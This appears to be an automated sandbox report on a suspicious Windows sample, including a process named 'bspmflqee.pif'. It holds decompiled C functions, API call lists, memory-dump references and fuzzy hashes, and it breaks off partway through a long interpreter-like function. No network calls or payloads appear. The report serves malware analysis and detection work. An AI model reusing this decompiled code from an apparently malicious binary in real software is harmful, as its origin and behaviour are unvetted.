              0x00d7e905
              0x00d7e898
              0x00d7e89d
              0x00d7e8a1
              0x00d7e8a3
              0x00d7e8a8
              0x00d7e8ad
              0x00d7e8c0
              0x00d7e8c0
              0x00d7e8a1
              0x00d7e896
              0x00d7e909

              APIs
                • Part of subcall function 00D7E7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D7E802
                • Part of subcall function 00D7E7E3: GetProcAddress.KERNEL32(00DB7350,CryptUnprotectMemory), ref: 00D7E812
              • GetCurrentProcessId.KERNEL32(?,?,?,00D7E85C), ref: 00D7E8E3
              Strings
              • CryptProtectMemory failed, xrefs: 00D7E8A3
              • CryptUnprotectMemory failed, xrefs: 00D7E8DB
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              • API String ID: 2190909847-396321323
              • Opcode ID: bd3ce1f9f0f03b09ba2b466277f141e83ba77dcf1e345af73e0dcf1cc15c1bad
              • Instruction ID: ca91255ae7a869f05d4dfbfc57a0586e83daf5ff79eff791222e6c56ec01d7f6
              • Opcode Fuzzy Hash: bd3ce1f9f0f03b09ba2b466277f141e83ba77dcf1e345af73e0dcf1cc15c1bad
              • Instruction Fuzzy Hash: B6115B317043169BDB059B39CC41B7A37C9DFC9B50B48C0A9F949DA392FB20ED0096B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D712D7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
              Download Yara Rule
              C-Code - Quality: 75%
              			E00D712D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00D7D6E4(0xdb0078, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00D7D70B(0xdb0078, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xdadfd4(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xda22e4);
								}
							}
						}
					}
				}
				return 0;
			}





              0x00d712de
              0x00d71341
              0x00d712e0
              0x00d712e0
              0x00d712e7
              0x00d712fd
              0x00d71306
              0x00d7130b
              0x00d71313
              0x00d7131b
              0x00d71323
              0x00d71331
              0x00d71331
              0x00d71323
              0x00d71313
              0x00d71306
              0x00d712e7
              0x00d71349

              APIs
                • Part of subcall function 00D7D70B: _swprintf.LIBCMT ref: 00D7D731
                • Part of subcall function 00D7D70B: _strlen.LIBCMT ref: 00D7D752
                • Part of subcall function 00D7D70B: SetDlgItemTextW.USER32(?,00DAD154,?), ref: 00D7D7B2
                • Part of subcall function 00D7D70B: GetWindowRect.USER32(?,?), ref: 00D7D7EC
                • Part of subcall function 00D7D70B: GetClientRect.USER32(?,?), ref: 00D7D7F8
              • GetDlgItem.USER32(00000000,00003021), ref: 00D7131B
              • SetWindowTextW.USER32(00000000,00DA22E4), ref: 00D71331
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              • API String ID: 2622349952-4108050209
              • Opcode ID: beef7cff91790482073cfe9914be16d1b9235faff549818e365b02dd195d3313
              • Instruction ID: 2ce65b7e005f74b9fec18e70fe6b83a6ca51d1d422347d7b3d1a884469447467
              • Opcode Fuzzy Hash: beef7cff91790482073cfe9914be16d1b9235faff549818e365b02dd195d3313
              • Instruction Fuzzy Hash: 48F044B4540358ABDF151F688C49BFA3F5AAF15344F08C114FC8E959A1D778C554DB30
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D804BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E00D804BA(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00D76CC9(E00D76CCE(_t6, 0xdb00e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xdb00e0, 0xdb00e0, 2);
				}
				return _t2;
			}






              0x00d804ba
              0x00d804c0
              0x00d804c9
              0x00d804d2
              0x00000000
              0x00d804f1
              0x00d804f2

              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00D805D9,?,?,00D8064E,?,?,?,?,?,00D80638), ref: 00D804C0
              • GetLastError.KERNEL32(?,?,00D8064E,?,?,?,?,?,00D80638), ref: 00D804CC
                • Part of subcall function 00D76CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D76CEC
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D804D5
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              • API String ID: 1091760877-2248577382
              • Opcode ID: 3c17d37bd4545791b364ac3314c30766223ca89fff12262d078bd9633403d29c
              • Instruction ID: 01cb7a9e3debf5ab703857b897ee14b1c7ef353e0ce8457c2b5cf76c6d1d2b76
              • Opcode Fuzzy Hash: 3c17d37bd4545791b364ac3314c30766223ca89fff12262d078bd9633403d29c
              • Instruction Fuzzy Hash: 55D0C7318485216AC60133296C0AABE3C05CB42370B608309F63AA03E6EA204C8082B9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7D6C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D7D6C1(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





              0x00d7d6c4
              0x00d7d6d4
              0x00d7d6dc
              0x00d7d6de
              0x00000000
              0x00d7d6de
              0x00d7d6e3

              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00D7CFBE,?), ref: 00D7D6C6
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D7CFBE,?), ref: 00D7D6D4
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              • API String ID: 3537982541-834975271
              • Opcode ID: cd36e37fcabfc634ee9c0d5ada2fcebad5cbdb05e547506e8487a55530fe7d24
              • Instruction ID: 26a0c8e8e9f79b431912bf8fb742f7d710dca3f394b8b2cc3b4720bb591c05c3
              • Opcode Fuzzy Hash: cd36e37fcabfc634ee9c0d5ada2fcebad5cbdb05e547506e8487a55530fe7d24
              • Instruction Fuzzy Hash: C0C012312823116AEB34173A6C0DBA73A5A7B02B12F1D044CB689DA2D0EAA5C844C7B4
              Uniqueness

              Uniqueness Score: -1.00%

              Analysis Process: bspmflqee.pif PID: 3836 Parent PID: 5216 bspmflqee.pifCOMMON

              Executed Functions

              Function 00F998F0, Relevance: 33.9, APIs: 21, Instructions: 2413COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 55%
              			E00F998F0(signed int* __eax, void* __eflags, void* __fp0, void* _a4, intOrPtr _a8, void* _a12, char* _a16) {
				intOrPtr _v8;
				short _v10;
				short _v12;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void _v32;
				intOrPtr _v36;
				char _v40;
				char _v52;
				void* _v56;
				signed int _v60;
				intOrPtr _v64;
				void _v68;
				char _v76;
				void* _v80;
				char _v84;
				void* _v88;
				void _v92;
				char _v100;
				void _v104;
				signed int _v108;
				void* _v112;
				void* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v132;
				void _v136;
				void _v140;
				signed int _v144;
				void* _v148;
				signed int _v152;
				void* _v156;
				signed int _v160;
				char _v161;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				WCHAR* _v180;
				signed int _v184;
				void _v188;
				void _v192;
				void* _v196;
				void* _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v224;
				intOrPtr _v228;
				void** __ebx;
				void* __edi;
				void* __esi;
				long _t937;
				void* _t938;
				signed int _t939;
				signed int* _t943;
				signed int _t946;
				signed int _t949;
				void* _t956;
				void* _t958;
				void* _t967;
				signed int _t968;
				signed int _t969;
				signed int _t974;
				signed int _t978;
				void* _t979;
				void* _t983;
				intOrPtr _t984;
				intOrPtr _t985;
				intOrPtr _t997;
				intOrPtr _t1000;
				void* _t1002;
				intOrPtr _t1003;
				void* _t1009;
				intOrPtr _t1011;
				void* _t1012;
				intOrPtr _t1013;
				void* _t1015;
				intOrPtr _t1016;
				void* _t1109;
				intOrPtr _t1111;
				void* _t1112;
				signed int _t1113;
				signed int _t1114;
				void _t1116;
				void* _t1123;
				void* _t1126;
				signed int _t1128;
				void* _t1129;
				signed int _t1130;
				void* _t1131;
				void* _t1139;
				void* _t1153;
				intOrPtr _t1158;
				void* _t1159;
				void* _t1160;
				signed int _t1162;
				void* _t1163;
				signed int _t1164;
				signed int _t1165;
				void* _t1166;
				void* _t1173;
				void* _t1176;
				signed int _t1177;
				signed int _t1193;
				signed int _t1194;
				short _t1195;
				void* _t1197;
				signed int _t1200;
				void* _t1202;
				signed int _t1204;
				void* _t1207;
				void* _t1215;
				void* _t1219;
				signed int _t1220;
				void* _t1222;
				void** _t1223;
				void* _t1227;
				intOrPtr* _t1228;
				signed int _t1229;
				void* _t1231;
				void* _t1232;
				signed int _t1235;
				signed int _t1236;
				void* _t1237;
				void* _t1239;
				void* _t1240;
				intOrPtr* _t1241;
				signed int _t1242;
				void* _t1243;
				void* _t1245;
				void* _t1246;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int* _t1252;
				void* _t1254;
				void* _t1256;
				void* _t1259;
				short* _t1265;
				void* _t1266;
				void _t1269;
				void* _t1270;
				void* _t1272;
				void* _t1276;
				void* _t1278;
				void* _t1281;
				void* _t1283;
				void* _t1284;
				void* _t1286;
				void* _t1288;
				signed int _t1290;
				signed int _t1291;
				signed int _t1295;
				signed int _t1296;
				void* _t1297;
				void* _t1298;
				intOrPtr* _t1308;
				signed int _t1310;
				signed int _t1311;
				void* _t1317;
				intOrPtr* _t1319;
				void* _t1322;
				void* _t1325;
				intOrPtr _t1330;
				signed int _t1332;
				intOrPtr _t1335;
				signed int _t1337;
				void* _t1341;
				void* _t1347;
				void _t1349;
				void* _t1350;
				signed int _t1351;
				signed int _t1352;
				long _t1354;
				void* _t1358;
				void* _t1359;
				void* _t1361;
				signed int _t1362;
				void _t1364;
				signed int _t1365;
				void* _t1369;
				void* _t1376;
				void* _t1379;
				intOrPtr* _t1382;
				void _t1385;
				intOrPtr _t1391;
				void* _t1393;
				intOrPtr _t1394;
				void* _t1396;
				void* _t1397;
				void* _t1402;
				void* _t1403;
				void** _t1406;
				signed int _t1407;
				void _t1411;
				signed int _t1412;
				long _t1413;
				void* _t1414;
				short _t1442;
				void* _t1443;
				void* _t1444;
				signed int _t1448;
				intOrPtr _t1450;
				intOrPtr _t1454;
				intOrPtr _t1455;
				void* _t1474;
				void* _t1477;
				void* _t1478;
				void* _t1485;
				void* _t1487;
				void** _t1488;
				signed int _t1493;
				signed int _t1507;
				void _t1508;
				void* _t1510;
				void* _t1511;
				void _t1513;
				void _t1519;
				void* _t1534;
				void* _t1537;
				void _t1545;
				signed int _t1549;
				intOrPtr _t1559;
				intOrPtr _t1561;
				intOrPtr _t1562;
				signed int _t1570;
				void* _t1593;
				WCHAR* _t1595;
				void _t1609;
				signed int _t1611;
				intOrPtr _t1617;
				intOrPtr _t1618;
				void* _t1652;
				signed int _t1660;
				signed int _t1664;
				intOrPtr _t1665;
				intOrPtr _t1668;
				void* _t1669;
				void* _t1672;
				void* _t1684;
				void* _t1693;
				intOrPtr _t1697;
				intOrPtr _t1710;
				intOrPtr _t1717;
				intOrPtr _t1725;
				void* _t1730;
				intOrPtr* _t1731;
				intOrPtr* _t1732;
				intOrPtr* _t1733;
				intOrPtr* _t1734;
				signed int _t1735;
				void _t1738;
				void* _t1740;
				void _t1741;
				signed int _t1746;
				signed int* _t1748;
				void* _t1750;
				signed int _t1753;
				signed int _t1754;
				long _t1755;
				signed int _t1761;
				intOrPtr _t1762;
				void* _t1763;
				void* _t1767;
				signed int _t1768;
				intOrPtr* _t1769;
				void* _t1770;
				void* _t1777;
				signed int _t1778;
				signed int _t1782;
				signed int _t1785;
				void* _t1787;
				void* _t1788;
				signed int _t1790;
				signed int _t1791;
				intOrPtr _t1796;
				signed int _t1799;
				signed int _t1803;
				void* _t1806;
				void* _t1809;
				void* _t1826;
				signed int _t1836;
				void* _t1851;

				_t1851 = __fp0;
				_t1391 = _a8;
				_t1728 = __eax;
				_t1757 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) +  *__eax * 4))))));
				_t937 = E00FA10E1( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) +  *__eax * 4)))))));
				_t1806 = (_t1803 & 0xfffffff8) - 0xd4 + 4;
				_v176 = _t937;
				_t938 = _t937 + 1;
				if(_t938 == 0) {
					_t939 = 8;
				} else {
					_t939 = (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3);
					_t1836 = _t939;
				}
				_v172 = _t939;
				_push( ~(0 | _t1836 > 0x00000000) | _t939 * 0x00000002);
				_v180 = E00FA14F7(_t1728, _t1757, _t1836);
				E00FA0D80(_t941, _t1757, _v176 + _v176 + 2);
				_push(4);
				_t943 = E00FA14F7(_t1728, _t1757, _t1836);
				_t1809 = _t1806 + 0x14;
				if(_t943 == 0) {
					_t943 = 0;
				} else {
					 *_t943 = 1;
				}
				_v168 = _t943;
				if( *((intOrPtr*)(_a4 + 0x140)) == 0) {
					L288:
					E00F92480( &_v180);
					goto L289;
				} else {
					if( *_t943 > 1) {
						 *_v168 =  *_v168 - 1;
						E00F915E0( &_v180);
						_t949 = E00FD653C(_v176 + 1);
						_v176 = _t949;
						_push( ~(0 | __eflags > 0x00000000) | _t949 * 0x00000002);
						_t1761 = E00FA14F7(_t1728, _t949, __eflags);
						E00FA0D80(_t1761, _v184, _v180 +  &(_v180[1]));
						_t1809 = _t1809 + 0x10;
						_v184 = _t1761;
					}
					CharUpperBuffW(_v180, _v176);
					_t956 = _a4;
					_t1762 =  *((intOrPtr*)(_t956 + 0x13c));
					if(_t1762 != 0) {
						_t958 =  *((intOrPtr*)(_t956 + 0x140)) - 1;
						__eflags = _t958;
						if(_t958 < 0) {
							goto L288;
						}
						_v136 = 0;
						_v116 = _t958;
						do {
							asm("cdq");
							_v200 = _v116 + _v136 - _v136 >> 1;
							__eflags = E00F9BF10( &_v180,  *((intOrPtr*)(_t1762 + (_v116 + _v136 - _v136 >> 1) * 4)));
							if(__eflags >= 0) {
								if(__eflags <= 0) {
									__eflags = _v136 - _v116;
									if(_v136 > _v116) {
										goto L288;
									}
									_t1763 =  *(_t1762 + _v200 * 4);
									E00F92480( &_v180);
									L17:
									_t967 = _t1763;
									if(_t967 == 0) {
										L289:
										_t946 = E0100DC75(__eflags, _t1851, _a4, _t1391, _t1728, _a12);
										L264:
										return _t946;
									}
									_v136 =  *((intOrPtr*)(_t967 + 0x14));
									_t968 =  *_t1728;
									_v160 =  *((intOrPtr*)(_t967 + 0x18));
									_v24 =  *((intOrPtr*)(_t967 + 0x10));
									_t1609 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t968 * 4)) + 0xa));
									_t969 = _t968 + 1;
									 *_t1728 = _t969;
									_v8 =  *((intOrPtr*)(_a4 + 0x148));
									_v196 = 0;
									_v188 = 1;
									_v184 = 0;
									_v180 = 0x1018068;
									_v176 = 0;
									_v172 = 0;
									_v168 = 0;
									_v132 = 0x101c440;
									_v128 = 0;
									_v124 = 0;
									_v120 = 0;
									if( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t969 * 4)) + 8)) != 0x47) {
										_push(_t1609);
										_push(0x6f);
										_push(_a4);
										L624:
										E00FEE724(_t1851);
										goto L625;
									} else {
										_t974 = _t969 + 1;
										_v104 = _t1609;
										_t1611 = _t974;
										_v204 = 0;
										_t1767 = 0;
										_v144 = _t1611;
										while(1) {
											 *_t1728 = _t974;
											_t1442 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4)) + 8));
											if(_t1442 < 0x47) {
											}
											L21:
											_t974 = _t974 + 1;
											while(1) {
												 *_t1728 = _t974;
												_t1442 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4)) + 8));
												if(_t1442 < 0x47) {
												}
												goto L22;
											}
											goto L21;
											L22:
											_t1443 = _t1442 - 0x47;
											__eflags = _t1443;
											if(_t1443 == 0) {
												_t1767 = _t1767 + 1;
												goto L21;
											}
											_t1444 = _t1443 - 1;
											__eflags = _t1444;
											if(_t1444 != 0) {
												__eflags = _t1444 != 0x37;
												if(_t1444 != 0x37) {
													goto L21;
												}
												_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4 - 4)) + 0xa)));
												_push(0x6f);
												_push(_a4);
												goto L624;
											}
											__eflags = _t1767;
											if(_t1767 != 0) {
												_t1767 = _t1767 - 1;
												_t974 = _t974 + 1;
												continue;
											}
											_v208 = _t974;
											 *_t1728 = _t974 + 1;
											_t978 = _v24;
											__eflags = _t978 -  *0x10390f8; // 0x0
											if(__eflags > 0) {
												L296:
												_v148 = _t1444;
												L28:
												_v116 = _t1444;
												__eflags = _v136 - _t1444;
												if(_v136 <= _t1444) {
													L57:
													_t979 = _v116;
													__eflags = _t979 - _v160;
													if(_t979 < _v160) {
														L622:
														_push(_v104);
														_push(0x70);
														goto L623;
													}
													__eflags = _t979 - _v136;
													if(_t979 > _v136) {
														goto L622;
													}
													__eflags = _t1611 - _v208;
													if(_t1611 != _v208) {
														goto L622;
													}
													_t1393 = _v24;
													_t1768 = 0;
													_v212 = 3;
													_v200 = 0;
													_v156 = 0;
													_v152 = _t1393;
													__eflags = _t1393;
													if(_t1393 < 0) {
														_v152 = 0;
													}
													__eflags =  *0x1037f3d; // 0x0
													if(__eflags != 0) {
														_t1611 =  *0x1037f38; // 0x0
														 *_t1611 = 0;
														_t1448 =  *0x1037f38; // 0x0
														 *((intOrPtr*)(_t1448 + 4)) = _v152;
														 *0x1037f3d = 0;
													} else {
														_push(0xc);
														_t1295 = E00FA14F7(_t1728, _t1768, __eflags);
														_t1809 = _t1809 + 4;
														__eflags = _t1295 - _t1768;
														if(_t1295 == _t1768) {
															_t1754 = 0;
														} else {
															_t1754 = _t1295;
															 *_t1754 = _t1768;
															_t1611 = _v152;
															 *(_t1754 + 4) = _t1611;
															__eflags = _v152 - _t1768;
															if(_v152 < _t1768) {
																 *(_t1754 + 4) = _t1768;
															}
															_t1296 = _v156;
															__eflags = _t1296 - _t1768;
															if(__eflags != 0) {
																_push(0x20);
																_v204 = _t1296;
																_t1297 = E00FA14F7(_t1754, _t1768, __eflags);
																_t1809 = _t1809 + 4;
																__eflags = _t1297 - _t1768;
																if(_t1297 == _t1768) {
																	_t1298 = 0;
																	__eflags = 0;
																} else {
																	_t1298 = E00FDB393(_t1297);
																}
																 *_t1754 = _t1298;
																E00F9DE00(_t1298, _v204);
																_t1790 = _v208;
																 *((intOrPtr*)( *_t1754 + 0x10)) =  *((intOrPtr*)(_t1790 + 0x10));
																 *((intOrPtr*)( *_t1754 + 0x14)) =  *((intOrPtr*)(_t1790 + 0x14));
																 *((intOrPtr*)( *_t1754 + 0x18)) = 0;
																 *((intOrPtr*)( *_t1754 + 0x1c)) = 0;
																E00FE33B8(_t1754,  *_t1754 + 0x18,  *((intOrPtr*)(_t1790 + 0x18)));
																_t1611 =  *(_t1790 + 0x1c);
																E00FE33B8(_t1754,  *_t1754 + 0x1c, _t1611);
																_t1768 = 0;
															} else {
																 *_t1754 = _t1768;
															}
														}
														_t1549 =  *0x1037f38; // 0x0
														 *(_t1754 + 8) = _t1549;
														 *0x1037f38 = _t1754;
													}
													_t983 = _v156;
													 *0x1037f34 =  *0x1037f34 + 1;
													__eflags = _t983 - _t1768;
													if(_t983 != _t1768) {
														_t1730 = _t983;
														_t984 =  *((intOrPtr*)(_t983 + 0x18));
														__eflags = _t984 - _t1768;
														if(_t984 != _t1768) {
															E00F9B650(_t1393,  &_v156, _t1730, _t984);
														}
														_t985 =  *((intOrPtr*)(_t1730 + 0x1c));
														__eflags = _t985 - _t1768;
														if(_t985 != _t1768) {
															E00F9B650(_t1393,  &_v156, _t1730, _t985);
														}
														__eflags =  *((char*)(_t1730 + 0x10));
														if( *((char*)(_t1730 + 0x10)) == 0) {
															_t1546 =  *((intOrPtr*)(_t1730 + 0x14));
															__eflags =  *((intOrPtr*)(_t1730 + 0x14)) - _t1768;
															if( *((intOrPtr*)(_t1730 + 0x14)) != _t1768) {
																E00F9E3C0(_t1546, _t1730, 1);
															}
														}
														E00FD651E(_t1730);
													}
													__eflags = _v136 - 1;
													if(_v136 < 1) {
														L146:
														_t1769 = _a4;
														_v100 = 0;
														_v88 = 0;
														_v84 = 0;
														_v80 = 0;
														_v76 = 0;
														_v68 = 0;
														_v56 = 0;
														_v52 = 0;
														 *((intOrPtr*)(_t1769 + 0x148)) = _v116;
														_v92 = 1;
														_v60 = 1;
														_t1450 =  *((intOrPtr*)( *_t1769 + 4));
														__eflags =  *((char*)(_t1450 + _t1769 + 0xd));
														_t1731 = _t1450 + _t1769 + 4;
														if(__eflags != 0) {
															E010038C9(_t1450,  *(_t1731 + 4),  &_v100);
															 *((char*)(_t1731 + 9)) = 0;
														} else {
															_push(0x40);
															_t1176 = E00FA14F7(_t1731, _t1769, __eflags);
															_t1809 = _t1809 + 4;
															__eflags = _t1176;
															if(_t1176 == 0) {
																_t1176 = 0;
															} else {
																__eflags = 0;
																 *(_t1176 + 8) = 1;
																 *((intOrPtr*)(_t1176 + 0xc)) = 0;
																 *_t1176 = 0;
																 *((char*)(_t1176 + 0x10)) = 0;
																 *((intOrPtr*)(_t1176 + 0x14)) = 0;
																 *((char*)(_t1176 + 0x18)) = 0;
																 *(_t1176 + 0x28) = 1;
																 *((intOrPtr*)(_t1176 + 0x2c)) = 0;
																 *((intOrPtr*)(_t1176 + 0x20)) = 0;
																 *((char*)(_t1176 + 0x30)) = 0;
															}
															 *(_t1176 + 0x38) =  *(_t1731 + 4);
															 *(_t1731 + 4) = _t1176;
														}
														 *_t1731 =  *_t1731 + 1;
														_t1394 =  *((intOrPtr*)(_t1769 + 0x16c));
														_t1732 = _t1769 + 0x16c;
														_t1451 = _t1769;
														_v156 =  *((intOrPtr*)(_t1769 + 0xf4));
														E00F99430(_t1769,  *((intOrPtr*)(_t1769 + 0xf4)), _t1851, _t1393 + 1); // executed
														__eflags = _t1394 -  *_t1732;
														if(_t1394 <  *_t1732) {
															do {
																E00F9C9E0(_t1394, _t1451, _t1732);
																__eflags = _t1394 -  *_t1732;
															} while (_t1394 <  *_t1732);
															goto L151;
														} else {
															L151:
															_t1733 = _t1769;
															 *((intOrPtr*)(_t1733 + 0xf4)) = _v156;
															_t1617 =  *((intOrPtr*)( *_t1733 + 4));
															__eflags =  *((char*)(_t1617 + _t1733 + 0xd));
															_t334 = _t1733 + 4; // 0x4
															_t997 =  *((intOrPtr*)(_t1617 + _t334 + 4));
															if( *((char*)(_t1617 + _t1733 + 0xd)) != 0) {
																_t997 =  *((intOrPtr*)(_t997 + 0x38));
															}
															__eflags =  *((char*)(_t997 + 0x10));
															if( *((char*)(_t997 + 0x10)) == 0) {
																_t1770 = _a12;
																 *_a16 = 0;
																E00F99190(_t1733, _t1770);
																 *(_t1770 + 8) = 1;
																 *_t1770 = 0;
																goto L166;
															} else {
																 *_a16 = 1;
																_t1158 =  *((intOrPtr*)( *_t1733 + 4));
																__eflags =  *((char*)(_t1158 + _t1733 + 0xd));
																_t1159 = _t1158 + _t1733 + 4;
																if( *((char*)(_t1158 + _t1733 + 0xd)) != 0) {
																	_t1777 =  *( *(_t1159 + 4) + 0x38);
																} else {
																	_t1777 =  *(_t1159 + 4);
																}
																_t1403 = _a12;
																__eflags = _t1403 - _t1777;
																if(_t1403 == _t1777) {
																	L166:
																	_t1453 =  *_t1733;
																	_t1618 =  *((intOrPtr*)( *_t1733 + 4));
																	__eflags =  *((char*)(_t1618 + _t1733 + 0xd));
																	_t1000 =  *((intOrPtr*)(_t1618 + _t1733 + 8));
																	_t1771 = _t1618 + _t1733 + 4;
																	if( *((char*)(_t1618 + _t1733 + 0xd)) != 0) {
																		_t1000 =  *((intOrPtr*)(_t1000 + 0x38));
																	}
																	__eflags =  *((char*)(_t1000 + 0x18));
																	if( *((char*)(_t1000 + 0x18)) != 0) {
																		_t1002 = E00F93EF0(_t1771);
																		_t1453 =  *((intOrPtr*)(_t1002 + 0x14));
																		_v80 =  *((intOrPtr*)(_t1002 + 0x14));
																	}
																	__eflags =  *((char*)(_t1771 + 9));
																	if( *((char*)(_t1771 + 9)) != 0) {
																		_t1003 =  *((intOrPtr*)( *((intOrPtr*)(_t1771 + 4)) + 0x38));
																	} else {
																		_t1003 =  *((intOrPtr*)(_t1771 + 4));
																	}
																	__eflags =  *((char*)(_t1003 + 0x30));
																	if( *((char*)(_t1003 + 0x30)) != 0) {
																		E00F990D0( &_v68, _t1453, E00F93EF0(_t1771) + 0x20);
																	}
																	_t1396 = _a4;
																	_t1454 =  *((intOrPtr*)( *_t1396 + 4));
																	__eflags =  *((char*)(_t1454 + _t1396 + 0xd));
																	_t1734 = _t1454 + _t1396 + 4;
																	if( *((char*)(_t1454 + _t1396 + 0xd)) != 0) {
																		_t1009 =  *(_t1734 + 4);
																		_t1771 =  *(_t1009 + 0x38);
																		__eflags = _t1009;
																		if(_t1009 != 0) {
																			E00FDCC67(_t1009);
																		}
																		 *(_t1734 + 4) = _t1771;
																		 *((char*)(_t1734 + 9)) = 0;
																	}
																	__eflags =  *((char*)(_t1734 + 8));
																	if( *((char*)(_t1734 + 8)) != 0) {
																		 *((char*)(_t1734 + 9)) = 1;
																		goto L190;
																	} else {
																		_t1771 =  *(_t1734 + 4);
																		_v156 =  *((intOrPtr*)(_t1771 + 0x38));
																		__eflags = _t1771;
																		if(_t1771 == 0) {
																			L189:
																			 *(_t1734 + 4) = _v156;
																			 *((char*)(_t1734 + 9)) = 0;
																			L190:
																			 *_t1734 =  *_t1734 - 1;
																			_t1011 =  *((intOrPtr*)( *_t1396 + 4));
																			_t1455 =  *((intOrPtr*)(_t1011 + _t1396 + 8));
																			_t1012 = _t1011 + _t1396;
																			__eflags =  *((char*)(_t1012 + 0xd));
																			if( *((char*)(_t1012 + 0xd)) != 0) {
